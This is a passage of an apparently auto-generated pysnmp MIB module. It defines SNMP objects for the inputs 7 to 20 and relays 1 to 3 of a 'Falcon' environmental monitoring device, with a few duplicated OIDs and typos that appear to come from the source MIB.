falconInput7Label = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 7, 5), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput7Label.setStatus('mandatory')
falconInput7UOM = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 7, 6), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput7UOM.setStatus('mandatory')
falconInput7HighLimit2 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 7, 7), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput7HighLimit2.setStatus('mandatory')
falconInput7HighLimit = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 7, 8), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput7HighLimit.setStatus('mandatory')
falconInput7LowLimit = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 7, 9), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput7LowLimit.setStatus('mandatory')
falconInput7LowLimit2 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 7, 10), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput7LowLimit2.setStatus('mandatory')
falconInput7RlyControl = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 7, 11), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput7RlyControl.setStatus('mandatory')
falconInput7Delay = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 7, 12), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 600))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput7Delay.setStatus('mandatory')
falconInput7Hysteresis = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 7, 13), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput7Hysteresis.setStatus('mandatory')
falconInput8 = MibIdentifier((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 8))
falconInput8State = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 8, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4))).clone(namedValues=NamedValues(("notInstalled", 1), ("analog-4to20-installed", 2), ("digital-no-installed", 3), ("digital-nc-installed", 4)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput8State.setStatus('mandatory')
falconInput8Reading = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 8, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readonly")
if mibBuilder.loadTexts: falconInput8Reading.setStatus('mandatory')
falconInput8Gain = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 8, 3), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput8Gain.setStatus('mandatory')
falconInput8Offset = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 8, 4), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput8Offset.setStatus('mandatory')
falconInput8Label = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 8, 5), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput8Label.setStatus('mandatory')
falconInput8UOM = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 8, 6), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput8UOM.setStatus('mandatory')
falconInput8HighLimit2 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 8, 7), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput8HighLimit2.setStatus('mandatory')
falconInput8HighLimit = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 8, 8), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput8HighLimit.setStatus('mandatory')
falconInput8LowLimit = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 8, 9), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput8LowLimit.setStatus('mandatory')
falconInput8LowLimit2 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 8, 10), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput8LowLimit2.setStatus('mandatory')
falconInput8RlyControl = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 8, 9), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput8RlyControl.setStatus('mandatory')
falconInput8Delay = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 8, 10), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 600))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput8Delay.setStatus('mandatory')
falconInput8Hysteresis = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 8, 11), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput8Hysteresis.setStatus('mandatory')
falconInput9 = MibIdentifier((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 25))
falconInput9State = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 25, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 3, 4))).clone(namedValues=NamedValues(("notInstalled", 1), ("digital-no-installed", 3), ("digital-nc-installed", 4)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput9State.setStatus('mandatory')
falconInput9Reading = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 25, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 1))).setMaxAccess("readonly")
if mibBuilder.loadTexts: falconInput9Reading.setStatus('mandatory')
falconInput9Label = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 25, 3), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput9Label.setStatus('mandatory')
falconInput9RlyControl = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 25, 4), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput9RlyControl.setStatus('mandatory')
falconInput9Delay = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 25, 5), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 600))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput9Delay.setStatus('mandatory')
falconInput10 = MibIdentifier((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 26))
falconInput10State = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 26, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 3, 4))).clone(namedValues=NamedValues(("notInstalled", 1), ("digital-no-installed", 3), ("digital-nc-installed", 4)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput10State.setStatus('mandatory')
falconInput10Reading = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 26, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 1))).setMaxAccess("readonly")
if mibBuilder.loadTexts: falconInput10Reading.setStatus('mandatory')
falconInput10Label = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 26, 3), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput10Label.setStatus('mandatory')
falconInput10RlyControl = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 26, 4), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput10RlyControl.setStatus('mandatory')
falconInput10Delay = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 26, 5), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 600))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput10Delay.setStatus('mandatory')
falconInput11 = MibIdentifier((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 27))
falconInput11State = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 27, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 3, 4))).clone(namedValues=NamedValues(("notInstalled", 1), ("digital-no-installed", 3), ("digital-nc-installed", 4)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput11State.setStatus('mandatory')
falconInput11Reading = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 27, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 1))).setMaxAccess("readonly")
if mibBuilder.loadTexts: falconInput11Reading.setStatus('mandatory')
falconInput11Label = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 27, 3), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput11Label.setStatus('mandatory')
falconInput11RlyControl = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 27, 4), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput11RlyControl.setStatus('mandatory')
falconInput11Delay = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 27, 5), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 600))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput11Delay.setStatus('mandatory')
falconInput12 = MibIdentifier((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 28))
falconInput12State = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 28, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 3, 4))).clone(namedValues=NamedValues(("notInstalled", 1), ("digital-no-installed", 3), ("digital-nc-installed", 4)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput12State.setStatus('mandatory')
falconInput12Reading = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 28, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 1))).setMaxAccess("readonly")
if mibBuilder.loadTexts: falconInput12Reading.setStatus('mandatory')
falconInput12Label = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 28, 3), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput12Label.setStatus('mandatory')
falconInput12RlyControl = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 28, 4), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput12RlyControl.setStatus('mandatory')
falconInput12Delay = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 28, 5), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 600))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput12Delay.setStatus('mandatory')
falconInput13 = MibIdentifier((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 29))
falconInput13State = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 29, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 3, 4))).clone(namedValues=NamedValues(("notInstalled", 1), ("digital-no-installed", 3), ("digital-nc-installed", 4)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput13State.setStatus('mandatory')
falconInput13Reading = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 29, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 1))).setMaxAccess("readonly")
if mibBuilder.loadTexts: falconInput13Reading.setStatus('mandatory')
falconInput13Label = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 29, 3), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput13Label.setStatus('mandatory')
falconInput13RlyControl = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 29, 4), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput13RlyControl.setStatus('mandatory')
falconInput13Delay = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 29, 5), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 600))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput13Delay.setStatus('mandatory')
falconInput14 = MibIdentifier((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 30))
falconInput14State = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 30, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 3, 4))).clone(namedValues=NamedValues(("notInstalled", 1), ("digital-no-installed", 3), ("digital-nc-installed", 4)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput14State.setStatus('mandatory')
falconInput14Reading = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 30, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 1))).setMaxAccess("readonly")
if mibBuilder.loadTexts: falconInput14Reading.setStatus('mandatory')
falconInput14Label = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 30, 3), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput14Label.setStatus('mandatory')
falconInput14RlyControl = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 30, 4), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput14RlyControl.setStatus('mandatory')
falconInput14Delay = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 30, 5), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 600))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput14Delay.setStatus('mandatory')
falconInput15 = MibIdentifier((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 31))
falconInput15State = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 31, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 3, 4))).clone(namedValues=NamedValues(("notInstalled", 1), ("digital-no-installed", 3), ("digital-nc-installed", 4)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput15State.setStatus('mandatory')
falconInput15Reading = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 31, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 1))).setMaxAccess("readonly")
if mibBuilder.loadTexts: falconInput15Reading.setStatus('mandatory')
falconInput15Label = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 31, 3), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput15Label.setStatus('mandatory')
falconInput15RlyControl = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 31, 4), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput15RlyControl.setStatus('mandatory')
falconInput15Delay = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 31, 50), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 600))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput15Delay.setStatus('mandatory')
falconInput16 = MibIdentifier((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 32))
falconInput16State = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 32, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 3, 4))).clone(namedValues=NamedValues(("notInstalled", 1), ("digital-no-installed", 3), ("digital-nc-installed", 4)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput16State.setStatus('mandatory')
falconInput16Reading = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 32, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 1))).setMaxAccess("readonly")
if mibBuilder.loadTexts: falconInput16Reading.setStatus('mandatory')
falconInput16Label = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 32, 3), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput16Label.setStatus('mandatory')
falconInput16RlyControl = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 32, 4), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput16RlyControl.setStatus('mandatory')
falconInput16Delay = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 32, 5), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 600))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput16Delay.setStatus('mandatory')
falconInput17 = MibIdentifier((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 33))
falconInput17State = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 33, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 3, 4))).clone(namedValues=NamedValues(("notInstalled", 1), ("digital-no-installed", 3), ("digital-nc-installed", 4)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput17State.setStatus('mandatory')
falconInput17Reading = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 33, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 1))).setMaxAccess("readonly")
if mibBuilder.loadTexts: falconInput17Reading.setStatus('mandatory')
falconInput17Label = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 33, 3), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput17Label.setStatus('mandatory')
falconInput17RlyControl = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 33, 4), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput17RlyControl.setStatus('mandatory')
falconInput17Delay = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 33, 5), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 600))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput17Delay.setStatus('mandatory')
falconInput18 = MibIdentifier((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 34))
falconInput18State = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 34, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 3, 4))).clone(namedValues=NamedValues(("notInstalled", 1), ("digital-no-installed", 3), ("digital-nc-installed", 4)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput18State.setStatus('mandatory')
falconInput18Reading = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 34, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 1))).setMaxAccess("readonly")
if mibBuilder.loadTexts: falconInput18Reading.setStatus('mandatory')
falconInput18Label = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 34, 3), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput18Label.setStatus('mandatory')
falconInput18RlyControl = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 34, 4), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput18RlyControl.setStatus('mandatory')
falconInput18Delay = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 34, 5), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 600))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput18Delay.setStatus('mandatory')
falconInput19 = MibIdentifier((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 35))
falconInput19State = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 35, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 3, 4))).clone(namedValues=NamedValues(("notInstalled", 1), ("digital-no-installed", 3), ("digital-nc-installed", 4)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput19State.setStatus('mandatory')
falconInput19Reading = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 35, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 1))).setMaxAccess("readonly")
if mibBuilder.loadTexts: falconInput19Reading.setStatus('mandatory')
falconInput19Label = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 35, 3), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput19Label.setStatus('mandatory')
falconInput19RlyControl = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 35, 4), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput19RlyControl.setStatus('mandatory')
falconInput19Delay = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 35, 5), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 600))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput19Delay.setStatus('mandatory')
falconInput20 = MibIdentifier((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 36))
falconInput20State = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 36, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 3, 4))).clone(namedValues=NamedValues(("notInstalled", 1), ("digital-no-installed", 3), ("digital-nc-installed", 4)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput20State.setStatus('mandatory')
falconInput20Reading = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 36, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 1))).setMaxAccess("readonly")
if mibBuilder.loadTexts: falconInput20Reading.setStatus('mandatory')
falconInput20Label = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 36, 3), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput20Label.setStatus('mandatory')
falconInput20RlyControl = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 36, 4), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput20RlyControl.setStatus('mandatory')
falconInput20Delay = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 36, 5), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 600))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput20Delay.setStatus('mandatory')
falconOutputs = MibIdentifier((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 4))
falconRelay1 = MibIdentifier((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 4, 1))
falconRelay1State = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 4, 1, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5))).clone(namedValues=NamedValues(("normallyoff", 1), ("normallyon", 2), ("forceon", 3), ("forceoff", 4), ("keypadcontrolled", 5)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconRelay1State.setStatus('mandatory')
falconRelay1Status = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 4, 1, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6))).clone(namedValues=NamedValues(("normaloff", 1), ("normalon", 2), ("forcedon", 3), ("forcedoff", 4), ("keycodeactive", 5), ("alarmedactive", 6)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: falconRelay1Status.setStatus('mandatory')
falconRelay1Label = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 4, 1, 3), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconRelay1Label.setStatus('mandatory')
falconRelay1Time = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 4, 1, 4), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconRelay1Time.setStatus('mandatory')
falconRelay2 = MibIdentifier((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 4, 2))
falconRelay2State = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 4, 2, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5))).clone(namedValues=NamedValues(("normallyoff", 1), ("normallyon", 2), ("forceon", 3), ("forceoff", 4), ("keypascontrolled", 5)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconRelay2State.setStatus('mandatory')
falconRelay2Status = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 4, 2, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6))).clone(namedValues=NamedValues(("normaloff", 1), ("normalon", 2), ("forcedon", 3), ("forcedoff", 4), ("keycodeactive", 5), ("alarmedactive", 6)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: falconRelay2Status.setStatus('mandatory')
falconRelay2Label = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 4, 2, 3), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconRelay2Label.setStatus('mandatory')
falconRelay2Time = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 4, 2, 4), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconRelay2Time.setStatus('mandatory')
falconRelay3 = MibIdentifier((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 4, 3))
falconRelay3State = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 4, 3, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5))).clone(namedValues=NamedValues(("normallyoff", 1), ("normallyon", 2), ("forceon", 3), ("forceoff", 4), ("keypascontrolled", 5)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconRelay3State.setStatus('mandatory')
falconRelay3Status = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 4, 3, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6))).clone(namedValues=NamedValues(("normaloff", 1), ("normalon", 2), ("forcedon", 3), ("forcedoff", 4), ("keycodeactive", 5), ("alarmedactive", 6)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: falconRelay3Status.setStatus('mandatory')
falconRelay3Label = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 4, 3, 3), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconRelay3Label.setStatus('mandatory')
falconRelay3Time = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 4, 3, 4), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconRelay3Time.setStatus('mandatory')
falconRelay4 = MibIdentifier((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 4, 4))
